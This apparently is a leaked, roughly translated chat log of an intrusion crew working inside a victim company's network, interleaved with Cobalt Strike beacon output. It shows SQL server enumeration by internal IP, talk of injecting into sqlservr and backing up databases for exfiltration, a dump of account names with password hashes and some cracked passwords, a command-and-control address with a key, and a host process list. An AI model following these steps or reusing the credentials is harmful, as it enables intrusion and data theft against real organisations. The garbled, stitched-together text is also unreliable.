Workforce sys dm_db_mirroring_connections VIEW NULL
Workforce sys dm_db_mirroring_past_actions VIEW NULL
Workforce sys dm_db_missing_index_details VIEW NULL
Workforce sys dm_db_missing_index_group_stats VIEW NULL
Workforce sys dm_db_missing_index_groups VIEW NULL
Workforce sys dm_db_partition_stats VIEW NULL
Workforce sys dm_db_persisted_sku_features VIEW NULL
Workforce sys dm_db_script_level VIEW NULL
Workforce sys dm_db_session_space_usage VIEW NULL
Workforce sys dm_db_task_space_usage VIEW NULL
Workforce sys dm_exec_background_job_queue VIEW NULL
Workforce sys dm_exec_background_job_queue_stats VIEW NULL
Workforce sys dm_exec_cached_plans VIEW NULL
Workforce sys dm_exec_connections VIEW NULL
Workforce sys dm_exec_procedure_stats VIEW NULL
Workforce sys dm_exec_query_memory_grants VIEW NULL
Workforce sys dm_exec_query_optimizer_info VIEW NULL
Workforce sys dm_exec_query_resource_semaphores VIEW NULL
Workforce sys dm_exec_query_stats VIEW NULL
Workforce sys dm_exec_query_transformation_stats VIEW NULL
Workforce sys dm_exec_requests VIEW NULL
Workforce sys dm_exec_sessions VIEW NULL
Workforce sys dm_exec_trigger_stats VIEW NULL
Workforce sys dm_filestream_file_io_handles VIEW NULL
Workforce sys dm_filestream_file_io_requests VIEW NULL
Workforce sys dm_fts_active_catalogs VIEW NULL
Workforce sys dm_fts_fdhosts VIEW NULL
Workforce sys dm_fts_index_population VIEW NULL
Workforce sys dm_fts_memory_buffers VIEW NULL
Workforce sys dm_fts_memory_pools VIEW NULL
Workforce sys dm_fts_outstanding_batches VIEW NULL
Workforce sys dm_fts_population_ranges VIEW NULL
Workforce sys dm_io_backup_tapes VIEW NULL
Workforce sys dm_io_cluster_shared_drives VIEW NULL
Workforce sys dm_io_pending_io_requests VIEW NULL
Workforce sys dm_os_buffer_descriptors VIEW NULL
Workforce sys dm_os_child_instances VIEW NULL
Workforce sys dm_os_cluster_nodes VIEW NULL
Workforce sys dm_os_dispatcher_pools VIEW NULL
Workforce sys dm_os_dispatchers VIEW NULL
Workforce sys dm_os_hosts VIEW NULL
Workforce sys dm_os_latch_stats VIEW NULL
Workforce sys dm_os_loaded_modules VIEW NULL
Workforce sys dm_os_memory_allocations VIEW NULL
Workforce sys dm_os_memory_brokers VIEW NULL
Workforce sys dm_os_memory_cache_clock_hands VIEW NULL
Workforce sys dm_os_memory_cache_counters VIEW NULL
Workforce sys dm_os_memory_cache_entries VIEW NULL
Workforce sys dm_os_memory_cache_hash_tables VIEW NULL
Workforce sys dm_os_memory_clerks VIEW NULL
Workforce sys dm_os_memory_node_access_stats VIEW NULL
Workforce sys dm_os_memory_nodes VIEW NULL
Workforce sys dm_os_memory_objects VIEW NULL
Workforce sys dm_os_memory_pools VIEW NULL
Workforce sys dm_os_nodes VIEW NULL
Workforce sys dm_os_performance_counters VIEW NULL
Workforce sys dm_os_process_memory VIEW NULL
Workforce sys dm_os_ring_buffers VIEW NULL
Workforce sys dm_os_schedulers VIEW NULL
Workforce sys dm_os_spinlock_stats VIEW NULL
Workforce sys dm_os_stacks VIEW NULL
Workforce sys dm_os_sublatches VIEW NULL
Workforce sys dm_os_sys_info VIEW NULL
Workforce sys dm_os_sys_memory VIEW NULL
Workforce sys dm_os_tasks VIEW NULL
Workforce sys dm_os_threads VIEW NULL
Workforce sys dm_os_virtual_address_dump VIEW NULL
Workforce sys dm_os_wait_stats VIEW NULL
Workforce sys dm_os_waiting_tasks VIEW NULL
Workforce sys dm_os_windows_info VIEW NULL
Workforce sys dm_os_worker_local_storage VIEW NULL
Workforce sys dm_os_workers VIEW NULL
Workforce sys dm_qn_subscriptions VIEW NULL
Workforce sys dm_repl_articles VIEW NULL
Workforce sys dm_repl_schemas VIEW NULL
Workforce sys dm_repl_tranhash VIEW NULL
Workforce sys dm_repl_traninfo VIEW NULL
Workforce sys dm_resource_governor_configuration VIEW NULL
Workforce sys dm_resource_governor_resource_pools VIEW NULL
Workforce sys dm_resource_governor_workload_groups VIEW NULL
Workforce sys dm_server_audit_status VIEW NULL
Workforce sys dm_server_memory_dumps VIEW NULL
Workforce sys dm_server_registry VIEW NULL
Workforce sys dm_server_services VIEW NULL
Workforce sys dm_tran_active_snapshot_database_transactions VIEW NULL
Workforce sys dm_tran_active_transactions VIEW NULL
Workforce sys dm_tran_commit_table VIEW NULL
Workforce sys dm_tran_current_snapshot VIEW NULL
Workforce sys dm_an_tran_current_transaction VIEW NULL
Workforce sys dm_tran_database_transactions VIEW NULL
Workforce sys dm_tran_locks VIEW NULL
Workforce sys dm_tran_session_transactions VIEW NULL
Workforce sys dm_tran_top_version_generators VIEW NULL
Workforce sys dm_tran_transactions_snapshot VIEW NULL
Workforce sys dm_tran_version_store VIEW NULL
Workforce sys dm_xe_map_values VIEW NULL
Workforce sys dm_xe_object_columns VIEW NULL
Workforce sys dm_xe_objects VIEW NULL
Workforce sys dm_xe_packages VIEW NULL
Workforce sys dm_xe_session_event_actions VIEW NULL
Workforce sys dm_xe_session_events VIEW NULL
Workforce sys dm_xe_session_object_columns VIEW NULL
Workforce sys dm_xe_session_targets VIEW NULL
Workforce sys dm_xe_sessions VIEW NULL
Workforce sys endpoint_webmethods VIEW NULL
Workforce sys endpoints VIEW NULL
Workforce sys event_notification_event_types VIEW NULL
Workforce sys event_notifications VIEW NULL
Workforce sys events VIEW NULL
Workforce sys extended_procedures VIEW NULL
Workforce sys extended_properties VIEW NULL
Workforce sys filegroups VIEW NULL
Workforce sys foreign_key_columns VIEW NULL
Workforce sys foreign_keys VIEW NULL
Workforce sys fulltext_catalogs VIEW NULL
Workforce sys fulltext_document_types VIEW NULL
Workforce sys fulltext_index_catalog_usages VIEW NULL
Workforce sys fulltext_index_columns VIEW NULL
Workforce sys fulltext_index_fragments VIEW NULL
Workforce sys fulltext_index_indexes VIEW NULL
Workforce sys fulltext_languages VIEW NULL
Workforce sys fulltext_stoplists VIEW NULL
Workforce sys fulltext_stopwords VIEW NULL
Workforce sys fulltext_system_stopwords VIEW NULL
Workforce sys function_order_columns VIEW NULL
Workforce sys http_endpoints VIEW NULL
Workforce sys identity_columns VIEW NULL
Workforce sys index_columns VIEW NULL
Workforce sys indexes VIEW NULL
Workforce sys internal_tables VIEW NULL
Workforce sys key_constraints VIEW NULL
Workforce sys key_encryptions VIEW NULL
Workforce sys linked_logins VIEW NULL
Workforce sys login_token VIEW NULL
Workforce sys master_files VIEW NULL
Workforce sys master_key_passwords VIEW NULL
Workforce sys message_type_xml_schema_collection_usages VIEW NULL
Workforce sys messages VIEW NULL
Workforce sys module_assembly_usages VIEW NULL
Workforce sys numbered_procedure_parameters VIEW NULL
Workforce sys numbered_procedures VIEW NULL
Workforce sys objects VIEW NULL
Workforce sys openkeys VIEW NULL
Workforce sys parameter_type_usages VIEW NULL
Workforce sys parameter_xml_schema_collection_usages VIEW NULL
Workforce sys parameters VIEW NULL
Workforce sys partition_functions VIEW NULL
Workforce sys partition_parameters VIEW NULL
Workforce sys partition_range_values VIEW NULL
Workforce sys partition_schemes VIEW NULL
Workforce sys partitions VIEW NULL
Workforce sys plan_guides VIEW NULL
Workforce sys procedures VIEW NULL
Workforce sys remote_logins VIEW NULL
Workforce sys remote_service_bindings VIEW NULL
Workforce sys resource_governor_configuration VIEW NULL
Workforce sys resource_governor_resource_pools VIEW NULL
Workforce sys resource_governor_workload_groups VIEW NULL
Workforce sys routes VIEW NULL
Workforce sys schemas VIEW NULL
Workforce sys securable_classes VIEW NULL
Workforce sys server_assembly_modules VIEW NULL
Workforce sys server_audit_specification_details VIEW NULL
Workforce sys server_audit_specifications VIEW NULL
Workforce sys server_audits VIEW NULL
Workforce sys server_event_notifications VIEW NULL
Workforce sys server_event_session_actions VIEW NULL
Workforce sys server_event_session_events VIEW NULL
Workforce sys server_event_session_fields VIEW NULL
Workforce sys server_event_session_targets VIEW NULL
Workforce sys server_event_sessions VIEW NULL
Workforce sys server_events VIEW NULL
Workforce sys server_file_audits VIEW NULL
Workforce sys server_permissions VIEW NULL
Workforce sys server_principal_credentials VIEW NULL
Workforce sys server_principals VIEW NULL
Workforce sys server_role_members VIEW NULL
Workforce sys server_sql_modules VIEW NULL
Workforce sys server_trigger_events VIEW NULL
Workforce sys server_triggers VIEW NULL
Workforce sys servers VIEW NULL
Workforce sys service_broker_endpoints VIEW NULL
Workforce sys service_contract_message_usages VIEW NULL
Workforce sys service_contract_usages VIEW NULL
Workforce sys service_contracts VIEW NULL
Workforce sys service_message_types VIEW NULL
Workforce sys service_queue_usages VIEW NULL
Workforce sys service_queues VIEW NULL
Workforce sys services VIEW NULL
Workforce sys soap_endpoints VIEW NULL
Workforce sys spatial_index_tessellations VIEW NULL
Workforce sys spatial_indexes VIEW NULL
Workforce sys spatial_reference_systems VIEW NULL
Workforce sys sql_dependencies VIEW NULL
Workforce sys sql_expression_dependencies VIEW NULL
Workforce sys sql_logins VIEW NULL
Workforce sys sql_modules VIEW NULL
Workforce sys stats VIEW NULL
Workforce sys stats_columns VIEW NULL
Workforce sys symmetric_keys VIEW NULL
Workforce sys synonyms VIEW NULL
Workforce sys sysaltfiles VIEW NULL
Workforce sys syscacheobjects VIEW NULL
Workforce sys syscharsets VIEW NULL
Workforce sys syscolumns VIEW NULL
Workforce sys syscomments VIEW NULL
Workforce sysconfigures VIEW NULL
Workforce sys sysconstraints VIEW NULL
Workforce sys syscurconfigs VIEW NULL
Workforce sys syscursorcolumns VIEW NULL
Workforce sys syscursorrefs VIEW NULL
Workforce sys syscursors VIEW NULL
Workforce sys syscursortables VIEW NULL
Workforce sys sysdatabases VIEW NULL
Workforce sysdepends VIEW NULL
Workforce sys sysdevices VIEW NULL
Workforce sys sysfilegroups VIEW NULL
Workforce sys sysfiles VIEW NULL
Workforce sys sysforeignkeys VIEW NULL
Workforce sys sysfulltextcatalogs VIEW NULL
Workforce sys sysindexes VIEW NULL
Workforce sys sysindexkeys VIEW NULL
Workforce sys syslanguages VIEW NULL
Workforce sys syslockinfo VIEW NULL
Workforce sys syslogins VIEW NULL
Workforce sys sysmembers VIEW NULL
Workforce sys sysmessages VIEW NULL
Workforce sys sysobjects VIEW NULL
Workforce sys sysoledbusers VIEW NULL
Workforce sys sysopentapes VIEW NULL
Workforce sys sysperfinfo VIEW NULL
Workforce sys syspermissions VIEW NULL
Workforce sys sysprocesses VIEW NULL
Workforce sys sysprotects VIEW NULL
Workforce sys sysreferences VIEW NULL
Workforce sys sysremotelogins VIEW NULL
Workforce syss sysservers VIEW NULL
Workforce sys system_columns VIEW NULL
Workforce sys system_components_surface_area_configuration VIEW NULL
Workforce sys system_internals_allocation_units VIEW NULL
Workforce sys system_internals_partition_columns VIEW NULL
Workforce sys system_internals_partitions VIEW NULL
Workforce sys system_objects VIEW NULL
Workforce sys system_parameters VIEW NULL
Workforce sys system_sql_modules VIEW NULL
Workforce sys system_views VIEW NULL
Workforce sys systypes VIEW NULL
Workforce sys sysusers VIEW NULL
Workforce sys table_types VIEW NULL
Workforce sys tables VIEW NULL
Workforce sys tcp_endpoints VIEW NULL
Workforce sys trace_categories VIEW NULL
Workforce sys trace_columns VIEW NULL
Workforce sys trace_event_bindings VIEW NULL
Workforce sys trace_events VIEW NULL
Workforce sys trace_subclass_values VIEW NULL
Workforce sys traces VIEW NULL
Workforce sys transmission_queue VIEW NULL
Workforce sys trigger_event_types VIEW NULL
Workforce sys trigger_events VIEW NULL
Workforce sys triggers VIEW NULL
Workforce sys type_assembly_usages VIEW NULL
Workforce sys types VIEW NULL
Workforce sys user_token VIEW NULL
Workforce sys via_endpoints VIEW NULL
Workforce sys views VIEW NULL
Workforce sys xml_indexes VIEW NULL
Workforce sys xml_schema_attributes VIEW NULL
Workforce sys xml_schema_collections VIEW NULL
Workforce sys xml_schema_component_placements VIEW NULL
Workforce sys xml_schema_components VIEW NULL
Workforce sys xml_schema_elements VIEW NULL
Workforce sys xml_schema_facets VIEW NULL
Workforce sys xml_schema_model_groups VIEW NULL
Workforce sys xml_schema_namespaces VIEW NULL
Workforce sys xml_schema_types VIEW NULL
Workforce sys xml_schema_wildcard_namespaces VIEW NULL
Workforce sys xml_schema_wildcards VIEW NULL

(449 rows affected)
``@tl1 said two databases need to be backed up hahaha what are we looking for in databases anyway? I'd just take a closer look at these.
nothing interesting in particular

InsightEnt
Intermec
SmartSystems
WimanDB
Workforceforceshare with size in megabytes so...[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=8DyG3ArtXqXhgJJ6t) ?what are you pulling@tl1 the rest are dead on one in netstat no whining
```
beacon> shell sqlcmd -S 10.89.11.118,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.11.118,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 108 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
ReportServer_AxUat
ReportServer_AxUatTempDB
ReportServer_AxCanada
ReportServer_AxCanadaTempDB
ReportServer_AxCrp5
ReportServer_AxCrp5TempDB
ReportServer_AxFinance
ReportServer_AxFinanceTempDB
ReportServer_AxTest
ReportServer_AxTestTempDB
ReportServer_AxTraining
ReportServer_AxTrainingTempDB

(16 rows affected)
```
 
``AXSQL-TRN
```
beacon> shell sqlcmd -S 10.89.0.52,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.0.52,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 106 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
Application_Registry_Service_DB_b6ae20a7272441d1b0597b0105d8c3e3
AX2012_BLD
AX2012_BLD_MB
AX2012_BLD_model
AX2012_CANADA
AX2012_CANADA_model
AX2012_CRP3
AX2012_CRP3_MB
AX2012_CRP4
AX2012_CRP4_MB
AX2012_CRP4_model
AX2012_CRP4_TRACEDB
AX2012_CRP5
AX2012_CRP5_model
AX2012_CRPFIN
AX2012_CRPFIN_model
AX2012_IMPTEST
AX2012_IMPTEST_model
AX2012_IMPTEST_Upgrade
AX2012_QA
AX2012_QA_model
AX2012_QA1
AX2012_QA1_MB
AX2012_QA1_model
AX2012_QA2
AX2012_QA2_CU12Baseline
AX2012_QA2_MB
AX2012_QA2_model
AX2012_SBX
AX2012_SBX_MB
AX2012_SBX_model
AX2012_STG
AX2012_STG_model
AX2012_TRACES
AX2012_TRN
AX2012_TRN_MB
AX2012_TRN_model
AX2012_TST
AX2012_TST_MB
AX2012_TST_model
AX2012_TST_TRACEDB
AX2012_TST1
AX2012_TST1_MB
AX2012_TST1_model
AX2012_TST1_TRACEDB
Bdc_Service_DB_c06a3175c91e44b2ac6f0da40d7f5b9d
CoreSiteStateService
DDM_AX2012_CRP4
distribution
Managed Metadata Service_e05ea79258b94560a6f89af90de24a7a
ManagementReporter_AX2012_CRP4
ManagementReporter_BLD
ManagementReporter_CRP4
ManagementReporter_TRN
ManagementReporterDM_BLD
ManagementReporterDM_CRP4
ManagementReporterDM_CRP45
ManagementReporterDM_SHEET_CRP45
ManagementReporterDM_TRN
master
model
MR2012CRP3
MR2012CRP3DDM
msdb
ProductVision_Template
ProductVision_Training
ProductVision50-DEV
ProductVision50-STAGE
RFSmart_TST
Search_Service_Application_CrawlStoreDB_8ca539d517b44414af8d236ed9912b4c
Search_Service_Application_DB_2b625dbe31d1470f89da704e564d9209
Search_Service_Application_PropertyStoreDB_d71aa79ecf9a42efbb75120fcb460ff4
Secure_Store_Service_DB_717048f580d24f16ae263e262f7763e5
SharePoint_AdminContent_a5eec525-c6b4-43bb-a842-d2507588d5a7
SharePoint_Config
SPDiagVersion
tempdb
Tfs_RTP
Tfs_TFSConfiguration
TraceParserDB
User Profile Service Application_ProfileDB_e4d31e78cfaa4bab9716b4174618c896
User Profile Service Application_SocialDB_e887f8a141424cf09b88acbac92025ad
User Profile Service Application_SyncDB_68310b46b85342f493548a2e3bd630c7
WebAnalyticsServiceApplication_ReportingDB_c519019f-5f79-4077-b1e8-892e007b8ffd
WebAnalyticsServiceApplication_StagingDB_64089515-b4ff-4bc5-a13a-401fa77f7d8b
WordAutomationServices_4f662a6015db47828d68f6f27fb36815
WSS_Content
WSS_Content_1f5ed39aa869422899ee05cb28f7eaa8
WSS_Content_7d7b46831e0949a49c62a626490e7514
WSS_Content_95f0c47fca3244c08b5a89e8d072af38
WSS_Content_b17f0e700e854d3e843fbcbf1bc17341
WSS_Content_d40efceac00144a1a49b27ead823f934
WSS_Content_EntPortal_CRP4
WSS_Content_EntPortal_TRN
WSS_Content_EntPortal_TST1
WSS_Content_f39f3064fc3e4e49955740c0797bd577
WSS_Content_f6816589378942539cf3f3814542be2e
WSS_Content_f847b732beb749dfbe560a080a9f7dcd
WSS_Content_f8c9f3af9e94407ba535a47b86435a7b
WSS_Logging
WSS_Search_AXSHAREPOINT

(101 rows affected)

```
  
`SQLSRV1`.
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 106 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
AX_Citrix
Citrix_Farm
Citrixcitrixvm4
CitrixOutside
InsightEnt
Intermec
Radius
SharePoint
SharePoint_AdminContent_f9392d6a-41ee-4790-b04e-f14acd5064ad
SmartSystems
Symantec
WimanDB
WimanDBTest
Workforce
WSS_AdminContent_Sharepoint
WSS_Content
WSS_Content_Teams

(21 rows affected)

``And also, doesn't this mean that the esx isn't configured and doesn't work? @tl1 run it on cmd5 plz
```
adonixadmin 88781646e2a2399370c54bae7f790e58
Angel 7259ade8efc785abb4043e171e06b9c6
barracuda b4712f346339be917d4d9fe2ce3c387c barracuda
BarracudaBUP 5acd3ae4a25e042cb01513ea9104b598
bbuerck f97f8542534b19414d871e197d222747
BGW 960736ab56cfa8943d4de07ef142a730 boston
CAncelet ae8e27dc85a2682037008ebe671655f0
canceleta b6c367027c0d73a755244ad52bda9a67
cevansa 6c77565149af62e68bb41868d29ec47a
DHaase e9b57eb8af25befb91bda9b4ed95097c
EntAdmin a99a74eb78fc1f1ea3a89b53b7de7179
gahbarracuda b4712f346339be917d4d9fe2ce3c387c barracuda
Services_Backup 4df7f5cc8377559b058c30516ca88a30
wstangea 652805d304727fa73d6c4c7cfef31986
veeam 5f6e5864d8622c481a233d9472f1b3a8
``Till now, here.

``ALLOYSQL01``
```
beacon> shell sqlcmd -S 10.1.1.243,49289 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.1.1.243,49289 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 107 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CitrixDS
x3v6
SEI
SEICube

(8 rows affected)
```
 
`SQLPROD1`.
```
beacon> shell sqlcmd -S 10.89.0.99,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.0.99,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 106 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
OnBaseTest
ksubscribers
kapps
KLCAuditReporting
SolarWindsOrion
SolarWindsFlowStorage
SolarWindsOrionLog
SolarWindsOrionLog_1
OnBase

(13 rows affected)
```
 
``AXSQL-PROD
```
beacon> shell sqlcmd -S 10.89.11.15,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S 10.89.11.15,1433 -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 107 bytes
[+] received output:
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
AX2012_PROD
AX2012_PROD_model
ProductVision_Live
ReportServer_AxLive
ReportServer_AxLiveTempDB
Remote Desktop Services

(10 rows affected)
``and backup 2 bdo you a few servers still ahead of you, ask me to read the conf conf) I asked you on what port skull read 3 times told me to read it and bluntlyu I have never done so udae neither one nor the other in the wasted a lot of time in the wasteland1433 he1344 moreover do not skull on what port skull
for remote/other local server change localhost to ip,port
alternatively - localhost,%port% (watch with netstat)

``what do you scan and why do I scan the ports, what came up - I threw it, no 1344 what exactly did I miss? You never read the confrSq51B↩lsevr iskonkretno sqlsrv process is not there[ ](http://mediaeveryone.com:3000/group/rtpcompany-com?msg=5LGeGhYeEdN7ac5Wb) @tl1
look, save the session on the skul server, process list
sqlwriter, inject, process closes
sqservr, either closes or is not injected

one has a session in the sqlservr process, I do the first command from your guide, it gives an error
```
beacon> shell sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 100 bytes
[+] received output:
HResult 0x2, Level 16, State 1
Named Pipes Provider: Could not open a connection to SQL Server [2].
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. The Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online...
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : Login timeout expired.
```

i'm scanning the ports, i've dumped them, no 1344
tried not on all yet, but I say so far is therepeau you have a VPN on the router? without a VPN pinged if we came in and you have not pinged[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=j5JGpr3MEqWEZ8Wkn) like yes vpntak may be a real thing in the connection to the internet?) not even pingedvpn my also came in I can not go to your cobu ``
209.222.101.55:44468
7e5cwdkA7IVxKavO28aD8v06XBaUG8Sd9
``Maybe then give what data on the coba for starters....)to you)) kicked out and does not connect To whom is the question? my coba failed? The genuine BackupService.exe file is a software component of Asus WebStorage by eCareme Technologies now ASUS Cloud Corporation.
 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 272 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 452 436 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 508,436 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 11340 508 logonUI.exe x64 1 NT AUTHORITY\SYSTEM
 6788 5964 explorer.exe x64 1 ALLOY\Administrator
 368 6788 cpqteam.exe x64 1 ALLOY\Administrator
 380 368 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 2144 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 2540 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 3212 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 3256 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 5204 380 conhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 6008 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 6020 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 6108 380 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 428 368 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 560 428 services.exe x64 0 NT AUTHORITY\SYSTEM
 140 560 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 6044 140 dwm.exe x64 1 ALLOY\Administrator
 396 560 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 684 560 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 4284 684 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 4304 684 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 6660 684 vdsldr.exe x64 0 NT AUTHORITY\SYSTEM
 768 560 svchost.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 872 560 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 928 560 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5468 928 taskeng.exe x64 0 NT AUTHORITY\SYSTEM
 5160 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 5860 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 5920 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 5952 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6208 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6232 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6256 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 6272 5468 rundll32.exe x64 0 NT AUTHORITY\SYSTEM
 988 560 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1048 560 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1148 560 spoolsv.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 1272 560 adxdsrv.exe x64 0 ALLOYSQL01\sagert
 1296 560 cissesrv.exe x64 0 NT AUTHORITY\SYSTEM
 1320 560 cpqrcmc.exe x64 0 NT AUTHORITY\SYSTEM
 1352 560 vcagent.exe x64 0 NT AUTHORITY\SYSTEM
 1388 560 KaseyaEndpoint.exe x64 0 NT AUTHORITY\SYSTEM
 1476 560 AgentMon.exe x86 0 NT AUTHORITY\SYSTEM
 5976 1476 Lua.exe x86 0 NT AUTHORITY\SYSTEM
 5988 1476 Lua.exe x86 0 NT AUTHORITY\SYSTEM
 6084 1476 Kaseya.AgentEndpoint.exe x86 0 NT AUTHORITY\SYSTEM
 1544 560 MsDtsSrvr.exe x64 0 NT AUTHORITY\SYSTEM
 1620 560 msmdsrv.exe x64 0 NT AUTHORITY\SYSTEM
 1652 560 sqlservr.exe x64 0 NT AUTHORITY\SYSTEM
 1760 560 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 1812 560 ReportingServicesService.exe x64 0 NT AUTHORITY/ LOCAL SERVICE
 1816 560 ccSvcHst.exe x86 0 NT AUTHORITY\SYSTEM
 720 1816 ccSvcHst.exe x86 1 ALLOY\Administrator
 2024 560 fdlauncher.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 5144 2024 fdhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2076 560 snmp.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 2112 560 SQLAGENT.EXE x64 0 NT AUTHORITY\SYSTEM
 2180 560 sqlbrowser.exe x86 0 NT AUTHORITY\LOCAL SERVICE
 2340 560 sysdown.exe x64 0 NT AUTHORITY\SYSTEM
 2380 560 smhstart.exe x64 0 NT AUTHORITY\SYSTEM
 2528 2380 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 2556 2528 hpsmhd.exe x64 0 NT AUTHORITY\SYSTEM
 2908 2556 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 2928 2908 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 2936 2556 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 2952 2936 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 3092 2556 hpsmhd.exe x64 0 NT AUTHORITY\SYSTEM
 3204 3092 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 3236 3204 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 3248 3092 cmd.exe x64 0 NT AUTHORITY\SYSTEM
 3280 3248 rotatelogs.exe x64 0 NT AUTHORITY\SYSTEM
 2460 560 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM
 2600 560 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM
 2644 560 cpqnimgt.exe x64 0 NT AUTHORITY\SYSTEM
 2676 560 cqmgserv.exe x64 0 NT AUTHORITY\SYSTEM
 2708 560 cqmgstor.exe x64 0 NT AUTHORITY\SYSTEM
 2776 560 BackupService.exe x64 0 NT AUTHORITY\SYSTEM
 3176 560 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 4264 560 VSSVC.exe x64 0 NT AUTHORITY\SYSTEM
 4392 560 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 5132 560 dllhost.exe x64 0 NT AUTHORITY\SYSTEM
 5352 560 msdtc.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 5540 560 taskhost.exe x64 1 ALLOY\Administrator
 6756 560 vds.exe x64 0 NT AUTHORITY\SYSTEM
 568 428 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 584 428 lsm.exe x64 0 NT AUTHORITY\SYSTEM
 5292 6788 vm3dservice.exe x64 1 ALLOY\Administrator
 6200 6788 vmtoolsd.exe x64 1 ALLOY\Administrator
 7120 1008 KaUsrTsk.exe x86 1 ALLOY\Administrator
Read #general again, I think it's 1344, I threw down all the ports, what was the whine port?
10.1.1.243:3389
10.1.1.243:139
10.1.1.243:135
10.1.1.243:445 (platform: 500 version: 6.1 name: ALLOYSQL01 domain: ALLOY)
```sqlwriter is there? What is the process and what is the port of the whine?
```
beacon> shell sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[*] Tasked beacon to run: sqlcmd -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"
[+] host called home, sent: 100 bytes
[+] received output:
HResult 0x2, Level 16, State 1
Named Pipes Provider: Could not open a connection to SQL Server [2].
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. The Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online...
Sqlcmd: Error: Microsoft SQL Server Native Client 10.0 : Login timeout expired.
